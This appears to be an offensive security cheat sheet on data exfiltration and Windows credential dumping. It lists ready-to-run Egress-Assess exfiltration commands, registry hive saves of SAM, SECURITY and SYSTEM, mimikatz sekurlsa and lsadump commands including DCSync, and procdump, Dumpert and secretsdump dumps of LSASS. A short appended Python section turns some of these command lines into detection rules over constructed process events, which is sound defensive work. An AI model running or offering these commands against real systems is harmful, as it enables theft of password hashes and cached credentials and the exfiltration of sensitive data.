Data Mining - Exfiltration

Exfiltration

https://github.com/FortyNorthSecurity/Egress-Assess
HTTP(S) - DNS - FTP

./Egress-Assess.py --server http[s] --username <username> --password <password>
Invoke-EgressAssess -client http[s] -IP <server-IP/domain> -Username <username> -Password <password> -Datatype ssn

Find interesting files

PowerView

Find-InterestingFile -Path \\server\share [-Include keyword1,keyword2] [-OfficeDocs] [-LastAccessTime (Get-Date).AddDays(-7)]

NetNTLMv1 hash of the current user

https://github.com/eladshamir/Internal-Monologue

Credentials

Without admin rights

With admin rights

Windows Credential Management

Thread/Process → Token → Logon Session → Auth Package → Credential (optional)
Network logon (type 3): the client proves it holds the credentials but never sends them to the server, so they are not left in the server's memory.
Non-network logon (Interactive, NetworkCleartext, etc.): the client sends the credentials to the service, so they are held in lsass.exe.

SAM

reg.exe save hklm\sam <C:\temp\sam>
reg.exe save hklm\system <C:\temp\system>
lsadump::sam
load kiwi
lsa_dump_sam
use post/windows/gather/smart_hashdump
use auxiliary/scanner/smb/impacket/secretsdump
impacket-secretsdump <admin>@<ip> -hashes <lm:nt>

It is possible to retrieve NTLM hashes without touching lsass. https://github.com/eladshamir/Internal-Monologue

Cache

reg.exe save hklm\security <C:\temp\security>
reg.exe save hklm\system <C:\temp\system>
lsadump::cache
run post/windows/gather/cachedump

LSASS

https://github.com/GhostPack/SafetyKatz

SafetyKatz.exe

Dumpert (https://github.com/outflanknl/Dumpert); remove the banners before compilation.
By default: C:\Windows\temp\dumpert.dmp

dumpert.exe
rundll32.exe dumpert.dll,Dump
-----
procdump.exe -accepteula -ma lsass.exe dump.dmp
-----
sekurlsa::minidump dump.dmp (offline)
sekurlsa::logonPasswords full (offline)
lsadump::lsa /patch
lsadump::lsa /inject [/id:<account_id> | /name:<account_name>]
use post/windows/gather/smart_hashdump
wce32.exe [-w]
fgdump [-u <user> -p <password> -h <ip>]

Logon sessions

lsadump::dcsync /user:<domain\user> /domain:<fqdn_domain> [/dc:<dc_name>]
sekurlsa::logonPasswords full
load kiwi
creds_all
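Detection counterpart to the SAM and LSASS sections above, added here as an example and not part of the original cheat sheet: it runs a few command-line rules over constructed process-creation records (field names assumed, modelled on Sysmon event 1 / Security 4688) for the reg.exe hive saves, procdump and Dumpert invocations listed on this page, and raises severity when one host has saved both hives needed to decrypt SAM or cached credentials offline.

```python
import re
from collections import defaultdict

# Constructed process-creation records (field names assumed, modelled on
# Sysmon Event ID 1 / Security 4688); not real telemetry.
SAMPLE_EVENTS = [
    {"host": "ws01", "user": "CORP\\alice", "cmdline": "reg.exe save hklm\\sam C:\\temp\\sam"},
    {"host": "ws01", "user": "CORP\\alice", "cmdline": "reg.exe save HKLM\\SYSTEM C:\\temp\\system"},
    {"host": "ws02", "user": "CORP\\bob", "cmdline": "procdump.exe -accepteula -ma lsass.exe dump.dmp"},
    {"host": "ws03", "user": "CORP\\carol", "cmdline": "rundll32.exe C:\\tools\\dumpert.dll,Dump"},
    {"host": "ws04", "user": "CORP\\dave", "cmdline": "reg.exe query hklm\\software\\microsoft\\windows"},
    {"host": "ws05", "user": "CORP\\erin", "cmdline": "reg.exe save hklm\\security C:\\temp\\sec"},
]

# Command-line patterns for the dumping commands the cheat sheet lists.
RULES = [
    ("reg_hive_save", re.compile(r"\breg(?:\.exe)?\s+save\s+hklm\\(sam|security|system)\b", re.I)),
    ("procdump_lsass", re.compile(r"\bprocdump(?:64)?(?:\.exe)?\b.*\s-ma\s+lsass(?:\.exe)?\b", re.I)),
    ("dumpert_lsass", re.compile(r"\brundll32(?:\.exe)?\s+\S*dumpert\.dll,\s*Dump\b", re.I)),
]

def match_event(event):
    """Return (rule_name, hive) for the first matching rule, else None; hive is set for reg saves only."""
    for name, rx in RULES:
        m = rx.search(event["cmdline"])
        if m:
            return name, (m.group(1).lower() if name == "reg_hive_save" else None)
    return None

def scan(events):
    """LSASS dumps are 'high' outright; a lone hive save is 'medium' and is raised to
    'high' once the same host has saved SYSTEM (bootkey) plus SAM or SECURITY, i.e.
    everything needed to decrypt the hashes or cached credentials offline."""
    hits, hives = [], defaultdict(set)
    for ev in events:
        res = match_event(ev)
        if res is None:
            continue
        rule, hive = res
        if hive:
            hives[ev["host"]].add(hive)
        hits.append({"host": ev["host"], "user": ev["user"], "rule": rule, "hive": hive,
                     "severity": "medium" if rule == "reg_hive_save" else "high"})
    for h in hits:
        saved = hives.get(h["host"], set())
        if h["hive"] and "system" in saved and saved & {"sam", "security"}:
            h["severity"] = "high"
    return hits
```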